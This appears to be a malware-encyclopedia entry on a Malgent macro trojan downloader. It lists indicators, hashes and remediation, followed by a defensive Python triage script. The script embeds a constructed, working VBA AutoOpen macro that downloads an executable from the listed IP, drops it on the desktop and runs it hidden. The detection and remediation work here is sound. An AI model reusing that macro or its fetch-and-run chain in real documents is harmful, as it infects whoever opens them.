Concrete signature match: Trojan (appears legitimate but performs malicious actions), 32-bit Windows platform, family Malgent
This threat is a trojan downloader, typically delivered as a malicious macro inside an Office document. When the macro runs, it downloads a second-stage payload (boosting.exe) from a remote server (45.78.21.150), writes it to the user's desktop under a different name (quotation.exe), and executes it. The downloader itself does little else; its purpose is to establish a foothold so that more severe malware can be staged onto the system.
Relevant strings associated with this threat:
- = Environ("USERPROFILE") & "\Desktop" & "\quotation.exe" (MACROHSTR_EXT)
- http://45.78.21.150/boost/boosting.exe (MACROHSTR_EXT)
Associated file hashes (64-character hex digests, SHA-256 assumed):
- a12a8dc5fa6562ff4d64e031b57d735d970980060f0d9cb4f0caa526b3cd5caa
- effba77be35fb75299883957d3acf9560970a054bc85d20457552e3511293cd0
- a61dddb469f669b6cc0520593ac23c9f54761070cf700dbe5c694cf34215538a
- e9b15ced5ae1cc9f93b91f7e23beff15f2801a475cced0ef826653f3b3a89dcc
Remediation: Isolate the affected machine from the network. Run a full antivirus scan and remove all malicious components, including any quotation.exe dropped on the user's desktop. Block the payload-hosting IP (45.78.21.150) at the firewall and web proxy, and delete the initial infection vector (e.g., the phishing email and its attached document). Since the foothold is a macro, also confirm that macros in documents arriving from the internet are blocked by policy rather than left to the user to enable.
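The triage logic implied by the indicator strings and hashes above, as an added example that is not part of the original page and not any vendor's detection code: a Python script that scans extracted VBA source (for instance what olevba dumps from a document) for the download-and-execute shape, rebuilds the Environ("USERPROFILE") drop path from the string concatenation, and checks a file digest against the listed hashes. SAMPLE_MACRO is constructed to mirror the behaviour the page describes and is not the actual sample's code; the regexes, function names and scoring are my own.

```python
"""Triage helper for the Malgent macro-downloader indicators listed above.

Added example, not code from the original page: scans VBA source for the
download-then-execute pattern, rebuilds the Environ() drop path, and checks
file digests against the listed SHA-256 values.
"""
import hashlib
import re

# Indicators exactly as listed on the page.
IOC_URL = "http://45.78.21.150/boost/boosting.exe"
IOC_IP = "45.78.21.150"
IOC_DROP_NAME = "quotation.exe"
IOC_SHA256 = {
    "a12a8dc5fa6562ff4d64e031b57d735d970980060f0d9cb4f0caa526b3cd5caa",
    "effba77be35fb75299883957d3acf9560970a054bc85d20457552e3511293cd0",
    "a61dddb469f669b6cc0520593ac23c9f54761070cf700dbe5c694cf34215538a",
    "e9b15ced5ae1cc9f93b91f7e23beff15f2801a475cced0ef826653f3b3a89dcc",
}

# Constructed sample (assumption): a macro shaped like the described
# behaviour so the functions below have realistic input to run on offline.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim dst As String
    dst = Environ("USERPROFILE") & "\Desktop" & "\quotation.exe"
    Dim req As Object, strm As Object
    Set req = CreateObject("MSXML2.XMLHTTP")
    req.Open "GET", "http://45.78.21.150/boost/boosting.exe", False
    req.Send
    Set strm = CreateObject("ADODB.Stream")
    strm.Open: strm.Type = 1: strm.Write req.responseBody
    strm.SaveToFile dst, 2
    Shell dst, vbHide
End Sub
'''

URL_RE = re.compile(r'https?://[^\s"\'<>()]+')
IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
AUTOEXEC_RE = re.compile(
    r'\b(?:AutoOpen|AutoExec|Auto_Open|Document_Open|Workbook_Open)\b', re.I)
DOWNLOAD_RE = re.compile(
    r'(?:MSXML2\.(?:Server)?XMLHTTP|WinHttp\.WinHttpRequest'
    r'|URLDownloadToFile|ADODB\.Stream)', re.I)
EXEC_RE = re.compile(r'\b(?:Shell|WScript\.Shell|ShellExecute|CreateProcess)\b', re.I)
# Environ("VAR") & "lit" & "lit" ... : the drop-path construction seen above.
ENVIRON_CONCAT_RE = re.compile(r'Environ\("(\w+)"\)((?:\s*&\s*"[^"]*")+)')
STR_LIT_RE = re.compile(r'"([^"]*)"')


def extract_drop_paths(vba: str) -> list[str]:
    """Rebuild Environ("VAR") & "..." chains into %VAR%... form."""
    paths = []
    for var, tail in ENVIRON_CONCAT_RE.findall(vba):
        paths.append("%" + var + "%" + "".join(STR_LIT_RE.findall(tail)))
    return paths


def triage_macro(vba: str) -> dict:
    """Return extracted indicators plus two verdicts.

    known_ioc: matches the specific indicators on this page.
    downloader_pattern: generic auto-exec + fetch + run shape, so a
    re-hosted variant with a new IP and filename is still flagged.
    """
    urls = URL_RE.findall(vba)
    ips = sorted(set(IPV4_RE.findall(vba)))
    drop_paths = extract_drop_paths(vba)
    findings = {
        "urls": urls,
        "ips": ips,
        "drop_paths": drop_paths,
        "auto_exec": bool(AUTOEXEC_RE.search(vba)),
        "downloads": bool(DOWNLOAD_RE.search(vba)),
        "executes": bool(EXEC_RE.search(vba)),
    }
    findings["known_ioc"] = (
        IOC_URL in urls
        or IOC_IP in ips
        or any(p.lower().endswith(IOC_DROP_NAME) for p in drop_paths)
    )
    findings["downloader_pattern"] = (
        findings["downloads"] and findings["executes"] and bool(urls)
    )
    return findings


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def matches_known_hash(data: bytes) -> bool:
    """True if the file's SHA-256 is one of the digests listed for this threat."""
    return sha256_hex(data) in IOC_SHA256


if __name__ == "__main__":
    for key, value in triage_macro(SAMPLE_MACRO).items():
        print(f"{key}: {value}")
```

The generic downloader_pattern verdict is the one worth keeping in a detection pipeline: the IP, URL and filename on this page are cheap for the operator to rotate, while the macro's shape (auto-exec entry point, HTTP fetch, write to disk, Shell) is what a downloader has to retain.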